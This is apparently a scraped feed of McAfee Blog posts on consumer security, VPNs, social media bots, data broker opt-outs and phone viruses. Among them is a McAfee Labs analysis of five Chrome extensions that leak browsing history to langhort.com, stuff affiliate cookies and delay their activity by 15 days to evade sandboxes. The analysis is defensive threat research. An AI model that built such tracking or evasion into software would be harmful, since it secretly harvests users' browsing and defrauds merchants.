Fears and phobias develop when we perceive that we are at risk of pain, or worse, still, death. And while almost a third of respondents nominated snakes as their number one fear, there is less than one-in-fifty thousand chance of being bitten badly enough by a snake to warrant going to hospital in Australia, according to research from the Internal Medicine Journal.

In contrast, McAfee’s analysis of more than 108 billion potential online threats between October and December, identified 202 million of these threats as genuine risks. With a global population of 7.5 billion, that means there is approximately a one in 37 chance of being targeted by cybercrime. Now while this is not a life-threatening situation, these statistics show that chance of us being affected by an online threat is very real.

What Are Our Biggest Cyber Fears?

According to the research, 82% of Aussies believe that being hacked is a growing or high concern. And when you look at the sheer number of reported data breaches so far this year, these statistics make complete sense. Data breaches have affected Bunnings staff, Federal Parliament staff, Marriott guests, Victorian Government staff, QLD Fisheries members, Skoolbag app users and Big W customers plus many more.

Almost 1 in 5 (19%) of those interviewed said their top fear at work is doing something that will result in a data security breach, they will leak sensitive information or infect their corporate IT systems.

The fear that we are in the midst of a cyberwar is another big concern for many Aussies. Cyberwar can be explained as a computer or network-based conflict where parties try to disrupt or take ownership of the activities of other parties, often for strategic, military or cyberespionage purposes. 55% of Aussies believe that a cyberwar is happening right now but we just don’t know about it. And a fifth believe cyber warfare is the biggest threat to our nation.

What Can We Do to Address Our Fear of Being Hacked?

Being proactive about protecting your online life is the absolute best way of reducing the chances of being hacked or being affected by a data breach. Here are my top tips on what you can now to protect yourself:

  1. Be Savvy with Your Passwords

Using a password manager to create unique and complex passwords for each of your online accounts will definitely improve your online safety. If each on your online accounts has a unique password and you are involved in a breach, the hacker won’t be able to use the stolen password details to log into any of your other accounts.

  1. Stop AutoFill on Chrome

Storing your financial data within your browser and being able to populate online forms quickly within seconds makes the autofill function very attractive however it is risky. Autofill will automatically fill out all forms on a page regardless of whether you can see all the boxes. You may just think you are automatically entering your email address into an online form however a savvy hacker could easily design an online form with hidden boxes designed to capture your financial information. So remove all your financial information from Autofill. I know this means you will have to manually enter information each time you purchase but your personal data will be better protected.

  1. Think Before You Click

One of the easiest ways for a cybercriminal to compromise their victim is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phoney website designed to steal personal information. If the deal seems too good to be true, or the email was not expected, always check directly with the source.

  1. Stay Protected While You Browse

It’s important to put the right security solutions in place in order to surf the web safely. Add an extra layer of security to your browser with McAfee WebAdvisor.

  1. Always Connect with Caution

I know public Wi-Fi might seem like a good idea, but if consumers are not careful, they could be unknowingly exposing personal information or credit card details to cybercriminals who are snooping on the network. If you are a regular Wi-Fi user, I recommend investing in a virtual private network or (VPN) such as McAfee Secure VPN which will ensure your connection is completely secure and that your data remains safe.

While it is tempting, putting our head in the sand and pretending hackers and cybercrime don’t exist puts ourselves and our families at even more risk! Facing our fears and making an action plan is the best way of reducing our worry and stress. So, please commit to being proactive about your family’s online security. Draw up a list of what you can do today to protect your tribe. And if you want to receive regular updates about additional ways you can keep your family safe online, check out my blog.

‘till next time.

Alex x

The post Aussies Fear Snakes, Spiders and Getting Hacked appeared first on McAfee Blog.

]]>
Privacy, please! Why a VPN on your smartphone may be a smart move for you. https://www.mcafee.com/blogs/mobile-security/privacy-please-why-a-vpn-on-your-smartphone-may-be-a-smart-move-for-you/ Tue, 30 Aug 2022 17:55:54 +0000 https://www.mcafee.com/blogs/?p=158520

Using a VPN on your smartphone can boost your privacy in a big way, particularly with all the data tracking...

The post Privacy, please! Why a VPN on your smartphone may be a smart move for you. appeared first on McAfee Blog.

]]>

Using a VPN on your smartphone can boost your privacy in a big way, particularly with all the data tracking that’s happening out there today. 

For some time now, we’ve recommended a VPN when using public Wi-Fi in airports, libraries, hotels, and coffee shops. Given that these are public networks, a determined hacker can snoop on the other devices transmitting data on it. With a VPN, any connection becomes a secure connection, which includes public Wi-Fi. That advice still holds true. Yet there’s a good reason to use it on your smartphone all the time—for your privacy. 

Let’s start with a quick look at the two big things a VPN does for you. 

It makes you more secure. 

The bank-grade encryption used by a strong VPN shields your data and information while it’s in transit, which makes it terrifically difficult for hackers to spy on your connection. (Think of your data and information traveling through a tunnel that no one else can use or see into.) In that way, at VPN makes all kinds of online activities more secure—like banking, shopping, and checking up on your finances.  

It protects your privacy. 

By masking your whereabouts and your IP address, along with encryption that helps keep your activities private, a VPN reduces the personal information that others can collect and track. That includes internet service providers, social media companies, businesses, app developers, websites, and others who gather your data for marketing purposes or for resale to third parties. 

Your smartphone, your privacy, and a VPN 

As far as your privacy is concerned, a VPN on a smartphone can be a smart move. There are a couple of reasons for that: first, because of the way smartphones have additional tracking technologies built in, and second, because of all the trackable data we create when using smartphones as frequently as we do—up to six hours per day for some. 

As for how your smartphone is built, data collectors can harvest your personal information that reveals what you’re doing, when you’re doing it, and where you’re doing it as well. Several technologies allow them to pinpoint where you are at any given time, such as GPS and location services, along with Bluetooth connectivity and location tracking based on which cell phone tower you’re connected to. Even scanning a QR code with your phone can reveal location information. It can all get rather precise, which is of interest to advertisers, businesses, and even governments. 

Next, think about all the activities you do on your phone, with a special emphasis on the apps you use and the data they create, about your health, your shopping habits, your travels, who you’re chatting with, and what content you’re posting online—just to name a few things. Once again, that information in of itself is valuable to data collectors. It becomes even more valuable when they know where you do these things.  

Taken together, data broker companies readily gather this information from millions of devices, generating billions of data points, and create massive lists of targeted information. And that information gets quite specific. With some data brokers collecting hundreds and into the thousands of data points per person, they can provide interested buyers with a high-resolution snapshot of who you are, where you live, who’s in your family, your income, where you shop, what you like to buy—right on down to your favorite shampoo. And that’s just for starters. 

It’s little surprise that all this data brokering activity fuels a global business estimated at $200 billion U.S. dollars a year. 

How’s this happening? In large part by way of the privacy policies you may or may not have read. 

Within those policies, device manufacturers, social media companies, app developers, and so on will detail what data they collect, under what conditions, what they do with it, and if they share or resell that data to other parties. However, if you’ve ever taken a dive into the fine print of a privacy policy, what’s stated there isn’t always clear. Now consider all the apps you have on your phone and the privacy policies associated with each one—your personal data privacy picture gets even less clear. 

With digital data and information collection baked into so much of what we do online, it’s little wonder that more than 70% of people feel like their data privacy is out of their control. 

Yet there are things you can do. 

Protect your privacy on your smartphone with a VPN 

Using a VPN on your smartphone can make you far more anonymous online. A VPN can minimize the data that gets exposed as it transmits to and from your smartphone. As a result, companies and data brokers can potentially learn far less about you, your shopping, your travels, your habits, and any other information that they could possibly collect and otherwise profit from. 

While you have free VPN options available, I suggest steering clear of them. As with many “free” services, there’s going to be some catch, often involving data collection. For example, some so-called “free VPNs” have served up tracking malware or actually collected private data and information for sale—the very things you want a VPN to prevent.  

Given that this is your privacy we’re talking about, do a little background check. Has the VPN you’re considering been independently audited for security? The technology that powers ours undergoes a thorough audit every year. Search news articles and see if the VPN you’re looking at has a track record of collecting and selling data in any way. Again, with our VPN technology, we don’t log or track what you do online so your online activity remains private. ​ 

And a Personal Data Cleanup too … 

What about the information that’s already out there? Our Personal Data Cleanup can help you remove your personal information from high-risk data broker sites, so you can prevent it from being further collected and sold online. If you’re unsure if your data and information are out there, consider what one major data brokers has touted in the past—a reach of over 62 countries and the ability to reach over 2.5 billion consumers globally. With 5 billion internet users today, that accounts for half of the world’s online population. And that’s just one data broker alone. 

Moreover, consider that data brokers acquire plenty of information from places other than your smartphone and other connected devices. They skim and collate public records associated with you, information purchased from retailers with loyalty card programs, not to mention census data, court records, and motor vehicle records. And that’s just a few of the many sources. Using our Personal Data Cleanup can help remove those sorts of records too.  

Getting more privacy on your smartphone 

Together, the combination of a VPN and Personal Data Cleanup can help you become far more private than before. With so much of our digital lives getting collected, tracked, and tabulated, often without our knowledge thanks to confusing privacy policies, taking control of your privacy makes sense and only gets easier to do thanks to the tools and services available to you. 

The post Privacy, please! Why a VPN on your smartphone may be a smart move for you. appeared first on McAfee Blog.

]]>
Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users https://www.mcafee.com/blogs/other-blogs/mcafee-labs/malicious-cookie-stuffing-chrome-extensions-with-1-4-million-users/ Mon, 29 Aug 2022 19:00:46 +0000 https://www.mcafee.com/blogs/?p=158178

Authored by Oliver Devane and Vallabh Chole  September 9, 2022 Update: Since the original publication of this blog on August...

The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.

]]>

Authored by Oliver Devane and Vallabh Chole 

September 9, 2022 Update: Since the original publication of this blog on August 29, 2022, the Flipshope browser extension was updated in the Chrome Store on September 6, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.

September 30, 2022 Update: Since the original publication of this blog on August 29, 2022, the AutoBuy browser extension was updated in the Chrome Store on September 17, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.

 

A few months ago, we blogged about malicious extensions redirecting users to phishing sites and inserting affiliate IDs into cookies of eCommerce sites. Since that time, we have investigated several other malicious extensions and discovered 5 extensions with a total install base of over 1,400,000

The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage 

Apart from offering the intended functionality, the extensions also track the user’s browsing activity.  Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased.    

The users of the extensions are unaware of this functionality and the privacy risk of every site being visited being sent to the servers of the extension authors.  

The 5 extensions are  

Name  Extension ID  Users 
Netflix Party  mmnbenehknklpbendgmgngeaignppnbe  800,000 

Netflix Party 2 

flijfnhifgdcbhglkneplegafminjnhn  300,000 

FlipShope – Price Tracker Extension 

 

adikhbfjdbjkhelbdnffogkobkekkkej  80,000 

Full Page Screenshot Capture – Screenshotting 

 

pojgkmkfincpdkdgjepkmdekcahmckjp  200,000 
AutoBuy Flash Sales  gbnahglfafmhaehbdmjedfhdmimjcbed  20,000 

 

Technical Analysis 

This section contains the technical analysis of the malicious chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions perform similar behavior.   

Manifest.json 

 

The manifest.json sets the background page as bg.html. This HTML file loads b0.js and this is responsible for sending the URL being visited and injecting code into the eCommerce sites. 

B0.js 

The b0.js script contains many functions. This blog will focus on the functions which are responsible for sending the visited URLs to the server and processing the response.  

Chrome extensions work by subscribing to events which they then use as triggers to perform a certain activity. The extensions analyzed subscribe to events coming from chrome.tabs.onUpdated. chrome.tabs.onUpdated will trigger when a user navigates to a new URL within a tab.

Once this event triggers, the extension will set a variable called curl with the URL of the tab by using the tab.url variable. It creates several other variables which are then sent to d.langhort.com. The POST data is in the following format:

Variable  Description 
Ref  Base64 encoded referral URL 
County  The county of the device 
City  The city of the device 
Zip  The zip code of the device 
Apisend  A random ID generated for the user. 
Name  Base64 encoded URL being visited 
ext_name  The name of the chrome extensions 

 

The random ID is created by selecting 8 random characters in a character set. The code is shown below: 

The country, city, and zip are gathered using ip-api.com. The code is shown below: 

Upon receiving the URL, langhort.com will check if it matches a list of websites that it has an affiliate ID for, and If it does, it will respond to the query. An example of this is shown below: 

The data returned is in JSON format. The response is checked using the function below and will invoke further functions depending on what the response contains. 

Two of the functions are detailed below: 

Result[‘c’] – passf_url 

If the result is ‘c’ such as the one in this blog, the extension will query the returned URL. It will then check the response and if the status is 200 or 404, it will check if the query responded with a URL. If it did, it would insert the URL that is received from the server as an Iframe on the website being visited.  

Result[‘e’] setCookie 

If the result is ‘e’, the extension would insert the result as a cookie. We were unable to find a response of ‘e’ during our analysis, but this would enable the authors to add any cookie to any website as the extensions had the correct ‘cookie’ permissions.  

Behavioral flow 

The images below show the step-by-step flow of events while navigating to the BestBuy website.  

  1. The user navigates to bestbuy.com and the extension posts this URL in a Base64 format to d.langhort.com/chrome/TrackData/ 
  2. Langhort.com responds with “c” and the URL. The “c” means the extension will invoke the function passf_url() 
  3. passf_url() will perform a request against the URL 
  4. the URL queried in step 3 is redirected using a 301 response to bestbuy.com with an affiliate ID associated with the Extension owners 
  5. The extension will insert the URL as an Iframe in the bestbuy.com site being visited by the user 
  6. Shows the Cookie being set for the Affiliate ID associated with the Extension owners. They will now receive a commission for any purchases made on bestbuy.com  

Here is a video of the events 

Time delay to avoid automated analysis 

We discovered an interesting trick in a few of the extensions that would prevent malicious activity from being identified in automated analysis environments. They contained a time check before they would perform any malicious activity. This was done by checking if the current date is > 15 days from the time of installation.  

Conclusion  

This blog highlights the risk of installing extensions, even those that have a large install base as they can still contain malicious code.  

McAfee advises its customers to be cautious when installing Chrome extensions and pay attention to the permissions that they are requesting.   

The permissions will be shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog  

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.   

The Malicious code within the extension is detected as JTI/Suspect. Please perform a ‘Full’ scan via the product.  

Type  Value  Product  Detected 
Chrome Extension  Netflix Party – mmnbenehknklpbendgmgngeaignppnbe  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  FlipShope – Price Tracker Extension – Version 3.0.7.0 – adikhbfjdbjkhelbdnffogkobkekkkej  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  Full Page Screenshot Capture 

pojgkmkfincpdkdgjepkmdekcahmckjp 

Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  AutoBuy Flash Sales  gbnahglfafmhaehbdmjedfhdmimjcbed  Total Protection and LiveSafe  JTI/Suspect 
URL  www.netflixparty1.com  McAfee WebAdvisor  Blocked 
URL  netflixpartyplus.com  McAfee WebAdvisor  Blocked 
URL  goscreenshotting.com  McAfee WebAdvisor   Blocked 
URL  langhort.com  McAfee WebAdvisor  Blocked 
URL  Unscart.in  McAfee WebAdvisor  Blocked 
URL  autobuyapp.com  McAfee WebAdvisor  Blocked 

The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.

]]>
Here’s How to Steer Clear of Bot Accounts on Social Media https://www.mcafee.com/blogs/internet-security/heres-how-to-steer-clear-of-bot-accounts-on-social-media/ Thu, 25 Aug 2022 18:36:42 +0000 https://www.mcafee.com/blogs/?p=158170

“Congratulations, you’re a winner!”  “Did you know this public figure is trying to make your life worse? Click here for...

The post Here’s How to Steer Clear of Bot Accounts on Social Media appeared first on McAfee Blog.

]]>

“Congratulations, you’re a winner!” 

“Did you know this public figure is trying to make your life worse? Click here for what they don’t want you to know.” 

“Save thousands today with just one click!” 

Spam and bot accounts on social media are everywhere. You’ve likely encountered messages like these that attempt to get you to click on links or to stir your emotions in a frenzy. While bot accounts are usually more of an annoyance than anything, when they’re allowed to run rampant, they can quickly become dangerous to your personally identifiable information (PII) and create an emotionally charged mob mentality. 

Here’s what you should know about bot accounts, including how to steer clear of menacing ones, plus a reminder to watch what you share on (and with) social media sites. 

What Are Bot Accounts? 

Bot accounts are software-automated accounts that try to blend in and act like a real user. They post updates and follow other users, though there isn’t a real person behind the account. A spam account is a type of bot account that attempts to gain financially from its automated posts. Everyday people should be wary of social media bot accounts because they can be used to disseminate false information or phishing scams.  

One whistleblower of a social media giant recently divulged that the platform isn’t prioritizing deactivating bot accounts.1 This apathy sparks concerns about the company’s commitment to the security of its users. In the whistleblower’s same report, he stated that the social media site isn’t taking the necessary steps to protect itself from potential inside threats and it had fallen victim to at least 20 breaches in 2020 without reporting the incidents to the proper authorities. 

How to Spot and Steer Clear of Bot Accounts 

Some bot accounts aren’t malicious (merely an annoying tactic by companies to spread the word about their business), but it’s best to give all of them a wide berth and never click on any links in their posts. Those links could direct to unsecured outside sites laden with malware or drop you in the middle of a phishing scheme. 

You can often spot a malicious bot account by the tone of its messages. They’ll often try to inspire intense emotions, such as excitement, sadness, or rage, and attempt to get users to act or share the post. Do not engage with them, not even to argue their points. When you engage or share these posts with your network, it spreads false information and could dangerously manipulate public opinion.2 

3 Tips to Enjoy Social Media Safely 

Here are a few ways you can take your cybersecurity into your own hands when you can’t be sure that social media sites are looking out for the safety of users’ information: 

  1. Don’t overshare. We all have an oversharer amongst our friends whose constant life updates rule our newsfeeds. Oversharing personal details and events can be more than annoying though. They can also put the oversharer’s PII at risk. Social engineering is a tactic where cybercriminals learn enough about you online to either impersonate you or personalize phishing attacks to your passions to capitalize upon your emotions. To combat social engineering, you may want to set your account to private so strangers can’t lurk and glean valuable personal details. Also, deny follower or friend requests from people you don’t know in real life. It could be a bot account in disguise. Another option: don’t overshare! Keep some mystery about your life and save them for in-person gatherings.
  2. Don’t divulge non-essential personal details with social media sites. When you set up a social media profile, the site usually requests several crucial pieces of PII, but they aren’t marked as required fields. These details include your full birthday (including the year), your full name, and your hometown. Consider only sharing your birthday month and day. Keep your birth year to yourself. That way, your followers can still wish you a happy birthday, but you frustrate phishers and dark web crawlers who are seeking your full birthdate.  
  3. Don’t spread false information. To combat bots, the best thing to do is to not engage with them, or better yet, label them as spam or suspicious. From there, hopefully the social media site can handle the situation. False information can spread like wildfire. Even if a bot’s post is laughably inaccurate, do not share it with your followers. It only takes one follower to believe it and then spread it to their own audience and so on. 

Trust a Comprehensive Security Solution to Watch Out for You 

You can’t trust every company to look out for the safety of your personal information, but one organization you can trust is McAfee. McAfee Total Protection is a comprehensive identity and privacy protection solution for your digital life. Great social media habits go a long way toward keeping you safe online, and you can rest assured knowing that McAfee can fill in the gaps. McAfee Total Protection offers antivirus, identity monitoring, and security freeze in the case your information is leaked in a breach or a bot account gets ahold of key details. 

Keep on sharing your life’s milestones with your closest friends and family online. The next time you update your status, flag any suspicious accounts you come across, so everyone can enjoy social media confidently! 

1NBC News, “Twitter whistleblower alleges major security issues 

2Journal of Information Technology & Politics, “Harass, mislead & polarize: An analysis of Twitter political bots’ tactics in targeting the immigration debate before the 2018 U.S. midterm election 

The post Here’s How to Steer Clear of Bot Accounts on Social Media appeared first on McAfee Blog.

]]>
Embrace change! Chris’s McAfee Journey https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/embrace-change-chriss-mcafee-journey/ Thu, 25 Aug 2022 16:30:17 +0000 https://www.mcafee.com/blogs/?p=158097

In this career-journey series, Internal Audit Manager Chris shares his recent journey joining the McAfee finance team and why he...

The post Embrace change! Chris’s McAfee Journey appeared first on McAfee Blog.

]]>

In this career-journey series, Internal Audit Manager Chris shares his recent journey joining the McAfee finance team and why he is always learning something new in his role.

A typical day

I’m an Internal Audit Manager. Essentially, I work with my McAfee colleagues to understand the processes we follow and run tests to confirm everything is happening as it should.

Sometimes people find audits intimidating, but I do my best to reassure people that there are no hidden tricks and I respect their time. We’re just making sure things are going according to plan and we’re fulfilling our responsibilities.

In a typical day, I have three priorities: Dad, Work, Gym.

I’m normally up at 6 a.m. to cook breakfast for my son and myself, and then drop him off at school. His favorite is bacon and eggs! Since I work with people around the world, I catch up on emails and then review the day’s work and catch up with my team. From there, most of my day is spent in meetings with McAfee colleagues or external auditors.

Somewhere in the day I get in a one-hour workout. It’s tough to do sometimes, but I’d say I get to the gym 90% of the time. It’s a great reset for me: a time where I can focus on me and putting my body to the test.

And, of course, I pick up my son from school and have Dad Time! That’s really my day in repeat. It seems like the same thing but feels different every day. I’m always meeting new people and puzzling through different problems. Every day is a fresh challenge.

Joining McAfee

After interviewing with my future co-workers, I was excited to join the company. I thought, “Oh, this company is fun!” The culture seemed to be a place where not only do you get to come for work, but also have sense of community within it.

Also, it was a chance to work for a great boss. I knew she was a great boss because I worked for her before. She gives you the vision, then gives you the freedom to explore and get the work done. You really get to own your work. I appreciate that.​​

At McAfee, employees are a top priority. You’re not just a robot who has to work-work-work. It’s okay to have fun and take 10 minutes out to see how others are doing.

I like the way the company comes together to have contests and other fun activities. In Finance, we recently had a scavenger hunt with 70 people. It was great seeing the faces of people you’ve only talked to on the phone.

Another way we engage each other is with a recognition program called Bravo! You can write a letter to someone saying hey, I appreciate you. That makes you feel more valued as an employee.

I also like the quarterly updates we get from leaders. At other companies, I’ve seen that done once a year. It’s nice to hear from the CEO every quarter about what’s going on in the organization.​​​​​​​​​​​​​​

Learning and MAHC

There are two parts that make my role so rewarding. The first is I enjoy interacting with people and have a passion for learning. In this job, you hear so many cool stories, and I’m exposed to so many different areas and processes in across the business. There’s always something new to learn. It makes every day different.

Secondly, at McAfee I’m part of the McAfee African Heritage Community (MAHC). We get together and talk about things we want to share with other Community members and the rest of McAfee. I’ve met people I never would run into otherwise. That’s important to me as someone who’s fairly new to McAfee plus having worked remote all this time. It’s very cool to be part of a company that supports having communities.​​​​​​​​​​​​​​​​​​​​​

Getting outside my comfort zone

Honestly, my job is always outside my comfort zone. There’s always a new problem to be solved. But I like that. The way I see it, if you’re comfortable, you aren’t growing. You need to do something you haven’t done before to move to the next level.

As an auditor, I’m always helping others understand the audit process and how to provide solid information, so the audit goes well.

​​​​​​​Communication is key

One of the most helpful skills I have developed during my career is communication. I need to establish a rapport quickly in my work so we can work well together. Everybody is different, right? Some are more direct, some are more indirect, and some people are more casual than others. You always need to adjust when you meet people. Good communication skills help prevent misunderstandings, which is especially important in a global company like McAfee with so many different cultures.

My advice to anyone looking to drive their career forward is…

Embrace change! Change is just another way to grow, learn, and realize potential you didn’t know you had. Look at it as an opportunity. Raise your hand up when problems arise and take on that tough problem. The person who fixes the problem is the person everyone remembers.

The post Embrace change! Chris’s McAfee Journey appeared first on McAfee Blog.

]]>
How to Remove Personal Information From Data Broker Sites https://www.mcafee.com/blogs/tips-tricks/how-to-remove-personal-information-from-data-broker-sites/ Thu, 25 Aug 2022 02:20:57 +0000 https://www.mcafee.com/blogs/?p=158067

Data brokers are companies that collect your information from a variety of sources to sell or license it out to...

The post How to Remove Personal Information From Data Broker Sites appeared first on McAfee Blog.

]]>

Data brokers are companies that collect your information from a variety of sources to sell or license it out to other businesses. Before they can pass your data along, brokers analyze it to put you into specific consumer profiles. Consumer profiles help businesses suggest products you might like and create targeted marketing campaigns based on your interests.  

Companies who buy data from brokers use it for things like marketing or risk mitigation. For example, if you’re a guitarist, a guitar manufacturer might try to reach you with an ad for their instruments. If you’re in the market for car insurance, insurance providers might use your personal information to do a background check so they can assess the risk that you’ll be in a car accident.  

While businesses don’t typically use your information maliciously, there are risks involved with having your personal data spread online. There might be certain details you don’t want to share with the world, like health or criminal records or financial issues. 

Having your data featured online can also expose it to cybercriminals who might use it for identity theft. Sometimes, hackers can even breach information that’s stored in an information broker’s database. When a criminal has your data, they might be able to access your financial accounts, use your credit to secure a loan, or even use your insurance to receive medical care. 

This article shows you how to remove your information from data broker sites and protect your data privacy online 

Where do data brokers get your information?</h2> 

There are various ways for a data broker to access your personal information. Some of these information sources are offline. For example, a broker can peruse public records to view your voter registration information. 

Other information sources that brokers use are online. For instance, a broker might track your buying history to see which products you’re likely interested in. 

Below are some of the top sources data brokers use to collect consumer information. 

  • Websites you visit: Typically, websites and search engines have software trackers that store information about what you do on the internet. Data brokers use web scraping tools to collect data from the websites and social media pages you go to online.  
  • Items you’ve purchased: Data brokers are extremely interested in which products and services you’ve used in the past. They can track your online spending habits on retail and e-commerce sites. Brokers also want to know things like whether you’ve used coupons or loyalty cards to pay for items.  
  • Online agreement forms: Usually, you’ll have to agree to terms and conditions when you register for a new service or program online. Sometimes, companies add disclaimers in the fine print of their terms that notify you that your information can be shared. 
  • Public records: Brokers might be able to find information like your date of birth, Social Security number (SSN), marriage record, driving record, or court records simply by looking through public records 

How many data broker companies are there?

Data brokering is a worldwide industry that brings in around $200 billion annually. An estimated 4,000 data broker companies exist. The largest data broker companies include organizations like Acxiom, Experian, and Epsilon.  

Can you remove personal information from data broker sites?  

Most data broker sites will give you the ability to have your personal information removed from their database — but don’t expect it to be easy.  

You might have to follow a multi-step process to opt out of a broker site. Even after your information is removed, you may have to repeat the process periodically.  

Different regions have different laws when it comes to protecting consumer data. The European Union has the General Data Protection Regulation (GDPR), which gives consumers the right to request that a company deletes any personal information they have stored. 

In the United States, states have to create their own laws to safeguard consumer privacy. States like Colorado and California have enacted laws that allow consumers to have their personal information removed from data broker sites. 

How to remove personal information from data broker sites

The next few sections go over steps you can follow to get your information removed from various data broker sites. Many broker sites allow you to opt out of their data collection and advertising programs.  

Opting out can prevent brokers from collecting and sharing your information and help you avoid intrusive ads for things like pre-approved credit cards. 

Go to the data broker website

The first thing you’ll have to do is visit each data broker’s site that has your information. Some of the biggest data broker sites that might have your information include: 

 

  • Acxiom aggregates information from millions of consumers across the globe. It sells personal information like your religious beliefs and political affiliations to telemarketing and commerce businesses.  
  • Epsilon provides data to a variety of companies worldwide. It has a big database that holds information about millions of households and businesses. 
  • Oracle designs and manufactures database and networking solutions for businesses, in addition to being a huge data broker. Oracle will often work with third-party data brokers 
  • Equifax is one of the three big credit reporting bureaus in the U.S. It provides financial information to both businesses and investors. In 2017, a data breach at Equifax exposed the personal information of almost 150 million people.  
  • Experian is another one of the big credit bureaus in the U.S. Like Equifax, Experian provides financial data to businesses and investors. 
  • CoreLogic provides information to businesses like real estate companies and landlords trying to do things like screen applicants for rental properties.  

While these are some of the largest data broker sites around, this list is by no means exhaustive. There’s a large number of data-sharing sites out there. For example, people-search sites like PeekYou, Spokeo, and Whitepages, let average consumers search through databases of personal information.  

Create an account with the data broker site

It may seem counterintuitive to sign up for an account with a broker when all you want is to delete your information from their site, but most data brokers require you to register with them to opt out of data collection 

You’ll likely have to create an account with every data broker you want to opt out of. Unfortunately, this will require you to give the brokers some personal information, like your name, email address, and possibly a picture of your driver’s license. Cross out your license number if you have to send a photo of your ID.  

Find your personal information

After creating an account with a broker, you’ll likely have to visit their portal to find out whether they have your personal information listed. Checking to see what every data broker has listed about you can be a time-consuming process.  

Services like DeleteMe and Kanary will delete your information from data brokers. However, most of these sites charge a fee, and they only delete your information from a select number of sites. For example, DeleteMe removes your information from 36 different data broker sites 

You should also be aware that some data broker sites don’t allow third parties to request for information to be deleted on behalf of consumers.  

Make removal requests for each instance of data 

You’ll have to make a separate removal request for every data broker site you want to opt out of. Some data brokers make the process more difficult than others. Remember that data companies are always collecting records, so you may need to repeat the process of removing your information from data broker sites annually.  

Here’s how to opt out of some of the largest data brokering companies we mentioned earlier:  

  • Acxiom: Go to the Acxiom opt-out form or call their support number at 877-774-2094. Pick which types of data you don’t want the company to gather. It can take a few weeks for your request to process.  
  • Epsilon: Email optout@epsilon.com and include your name and mailing address. You can also use the opt-out form to ask the company not to sell your personal information or delete your data entirely. If you don’t want to use email, you can call Epsilon’s phone number at 866-267-3861. Epsilon will have a third party verify your identity by asking questions about your personal information.  
  • Oracle: Go to Oracle’s opt-out page. Type in your personal info and click submit. It can take up to a month for Oracle to process your request.  
  • Equifax: On Equifax’s opt-out prescreen page, click “Click Here to Opt In or Opt Out” at the bottom of the page. Pick the option “Electronic Opt Out for Five Years.” You’ll have to provide some personal information. Click submit.  
  • Experian: You’ll likely have to opt out of all of Experian’s services individually. Experian’s data sharing services include OmniActivation Strategic Services, Direct Mail, Telemarketing, and Email. You can also try sending an email to unsubscribeall@experian.com or unsubscribe@experian.com. If you send an email, include the exact phrase, “Unsubscribe me from Experian’s email database,” in your message.  
  • CoreLogic: Email privacy@corelogic.com. Your subject line will need to be “California Privacy Rights Request.” Your email must state that you’d like to remove yourself from the companies’ databases and opt out of marketing programs. The email should have your name and address. If you don’t get a confirmation in about a week, follow up and ask for the status of your request. You can also try filling out the company’s opt-out form and mailing it to CoreLogic Teletrack Opt-Out Request, P.O. Box 509124, San Diego, CA, 92150. 

Secure your identity online with McAfee Total Protection 

The data broker industry is enormous. A data brokerage can collect a wealth of information about you from a huge number of sources, and provide that information to businesses that use it to do things like design targeted marketing campaigns for their ideal consumers.  

Brokers can share sensitive information that you want to keep private, like medical data. Having your personal information floating around the internet makes it easier for cybercriminals to use it for personal gain. 

By opting out of information-sharing programs, you can protect your online privacy, reduce the number of intrusive advertisements and emails you receive, and make it less likely that identity thieves will target you.  

One of the best ways to protect yourself online is to use quality security software. When you sign up for McAfee’s Total Protection services, you’ll get features like award-winning antivirus software, 24/7 account monitoring, a secure virtual private network (VPN), and up to $1 million in identity theft coverage and restoration.  

When it comes to protecting your privacy online, McAfee has your back.  

The post How to Remove Personal Information From Data Broker Sites appeared first on McAfee Blog.

]]>
7 Signs Your Phone Has a Virus and What You Can Do https://www.mcafee.com/blogs/mobile-security/7-signs-your-phone-has-a-virus-and-what-you-can-do/ Thu, 25 Aug 2022 02:04:15 +0000 https://www.mcafee.com/blogs/?p=158035

Our phones store a lot of personal data, including contacts, social media account details, and bank account logins. We use...

The post 7 Signs Your Phone Has a Virus and What You Can Do appeared first on McAfee Blog.

]]>

Our phones store a lot of personal data, including contacts, social media account details, and bank account logins. We use our smartphones for everything under the sun, from work-related communication to online shopping. 

However, like computer viruses, our phones can be vulnerable to malware. Viruses are a type of malware that replicate themselves and spread throughout the entire system. They can affect your phone’s performance or, worse, compromise your sensitive information so that hackers can benefit monetarily. 

In this article, we give you a rundown of viruses that can infect your phone and how you can identify and eliminate them. We also provide some tips for protecting your phone from viruses in the first place. 

Can iPhone and Android devices get viruses?

iPhones and Android devices run on different operating systems. So, there are differences in the viruses that affect each type of mobile device and how resistant each operating system is to viruses.  

Viruses have a harder time penetrating iOS because of its design (although iOS hacks can still happen). By restricting interactions between apps, Apple’s operating system limits the movement of an iPhone virus across the device. However, if you jailbreak your iPhone or iPad to unlock tweaks or install third-party apps, then the security restrictions set by Apple’s OS won’t work. This exposes iPhone users to vulnerabilities that cybercriminals can exploit.   

While Android phones are also designed with cybersecurity in mind, their reliance on open-source code makes them an easier target for hackers. Android devices allow users to access third-party apps not available in the Google Play Store 

Main types of phone viruses

Cybercriminals today are sophisticated and can launch a variety of cyberattacks on your smartphone. Some viruses that can infect your phone include:  

  • Malware: Malware encompasses programs that steal your information or take control of your device without your permission. 
  • Adware: These are ads that can access information on your device if you click on them. 
